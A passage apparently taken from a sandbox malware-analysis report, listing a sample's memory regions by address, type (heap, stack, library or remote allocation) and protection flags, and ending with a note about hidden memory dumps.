trusted library allocation
|
page read and write
|
||
|
4768000
|
heap
|
page read and write
|
||
|
8880000
|
trusted library allocation
|
page read and write
|
||
|
2215F000
|
stack
|
page read and write
|
||
|
750E000
|
stack
|
page read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
79C0000
|
trusted library allocation
|
page read and write
|
||
|
5BFB000
|
trusted library allocation
|
page read and write
|
||
|
4778000
|
heap
|
page read and write
|
||
|
4750000
|
heap
|
page read and write
|
||
|
1DCADA20000
|
heap
|
page read and write
|
||
|
8B20000
|
direct allocation
|
page read and write
|
||
|
22991000
|
heap
|
page read and write
|
||
|
2AA4000
|
heap
|
page read and write
|
||
|
7A4C000
|
stack
|
page read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
4751000
|
heap
|
page read and write
|
||
|
4749000
|
heap
|
page read and write
|
||
|
4766000
|
heap
|
page read and write
|
||
|
7970000
|
trusted library allocation
|
page read and write
|
||
|
4756000
|
heap
|
page read and write
|
||
|
4270000
|
remote allocation
|
page execute and read and write
|
||
|
1DCADB57000
|
heap
|
page read and write
|
||
|
2FE6000
|
heap
|
page read and write
|
||
|
4762000
|
heap
|
page read and write
|
||
|
4B30000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DCAF4E0000
|
heap
|
page read and write
|
||
|
4773000
|
heap
|
page read and write
|
||
|
4755000
|
heap
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
2AA5000
|
heap
|
page read and write
|
||
|
7360000
|
heap
|
page read and write
|
||
|
2ABC000
|
heap
|
page read and write
|
||
|
2318D000
|
unclassified section
|
page execute and read and write
|
||
|
2AA5000
|
heap
|
page read and write
|
||
|
2940000
|
heap
|
page read and write
|
||
|
1DCADB0A000
|
heap
|
page read and write
|
||
|
4C43000
|
heap
|
page read and write
|
||
|
1CD997E000
|
stack
|
page read and write
|
||
|
1CD9876000
|
stack
|
page read and write
|
||
|
731D000
|
stack
|
page read and write
|
||
|
47C2000
|
heap
|
page read and write
|
||
|
23130000
|
unclassified section
|
page execute and read and write
|
||
|
312E000
|
stack
|
page read and write
|
||
|
6B26000
|
heap
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
2A80000
|
heap
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
2EB0000
|
heap
|
page read and write
|
||
|
4B40000
|
trusted library allocation
|
page read and write
|
||
|
1DCAFA4E000
|
heap
|
page read and write
|
||
|
4741000
|
heap
|
page read and write
|
||
|
5084000
|
heap
|
page read and write
|
||
|
729D000
|
stack
|
page read and write
|
||
|
4798000
|
heap
|
page read and write
|
||
|
4781000
|
heap
|
page read and write
|
||
|
4755000
|
heap
|
page read and write
|
||
|
2AA4000
|
heap
|
page read and write
|
||
|
948F000
|
direct allocation
|
page execute and read and write
|
||
|
6890000
|
heap
|
page read and write
|
||
|
4D41000
|
heap
|
page read and write
|
||
|
1DCB06D2000
|
trusted library allocation
|
page read and write
|
||
|
2A33000
|
stack
|
page read and write
|
||
|
2A34000
|
heap
|
page read and write
|
||
|
1DCAFD1C000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E13000
|
trusted library allocation
|
page execute and read and write
|
||
|
6B91000
|
heap
|
page read and write
|
||
|
2D7B000
|
heap
|
page read and write
|
||
|
3220000
|
trusted library allocation
|
page read and write
|
||
|
4745000
|
heap
|
page read and write
|
||
|
762A000
|
heap
|
page read and write
|
||
|
7960000
|
trusted library allocation
|
page read and write
|
||
|
8510000
|
trusted library allocation
|
page read and write
|
||
|
600000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
4A3E000
|
stack
|
page read and write
|
||
|
31B0000
|
trusted library section
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
1DCADC40000
|
heap
|
page read and write
|
||
|
863D000
|
heap
|
page read and write
|
||
|
13D000
|
stack
|
page read and write
|
||
|
4FD000
|
stack
|
page read and write
|
||
|
21EEF000
|
stack
|
page read and write
|
||
|
1DCB06FD000
|
trusted library allocation
|
page read and write
|
||
|
2FBA000
|
heap
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
84D0000
|
trusted library allocation
|
page read and write
|
||
|
4F40000
|
trusted library allocation
|
page read and write
|
||
|
4C52000
|
trusted library allocation
|
page read and write
|
||
|
785E000
|
stack
|
page read and write
|
||
|
2D1E000
|
unkown
|
page read and write
|
||
|
4B9E000
|
stack
|
page read and write
|
||
|
228E1000
|
direct allocation
|
page execute and read and write
|
||
|
85B5000
|
heap
|
page read and write
|
||
|
8530000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
21A30000
|
direct allocation
|
page read and write
|
||
|
225BE000
|
stack
|
page read and write
|
||
|
6B3A000
|
heap
|
page read and write
|
||
|
1DCAF4E5000
|
heap
|
page read and write
|
||
|
1CDAB0E000
|
stack
|
page read and write
|
||
|
735C000
|
stack
|
page read and write
|
||
|
1CD9AFC000
|
stack
|
page read and write
|
||
|
1CD9EB9000
|
stack
|
page read and write
|
||
|
6880000
|
heap
|
page readonly
|
||
|
890B000
|
stack
|
page read and write
|
||
|
8B80000
|
direct allocation
|
page read and write
|
||
|
1CDA0BE000
|
stack
|
page read and write
|
||
|
22A15000
|
heap
|
page read and write
|
||
|
2AA0000
|
heap
|
page read and write
|
||
|
222BF000
|
stack
|
page read and write
|
||
|
4C40000
|
heap
|
page read and write
|
||
|
1DCAFF7E000
|
trusted library allocation
|
page read and write
|
||
|
6B35000
|
heap
|
page read and write
|
||
|
31F0000
|
trusted library allocation
|
page read and write
|
||
|
2A34000
|
heap
|
page read and write
|
||
|
47C2000
|
heap
|
page read and write
|
||
|
1DCC7BB7000
|
heap
|
page execute and read and write
|
||
|
223B0000
|
remote allocation
|
page read and write
|
||
|
523C000
|
trusted library allocation
|
page read and write
|
||
|
4750000
|
heap
|
page read and write
|
There are 761 hidden memdumps, click here to show them.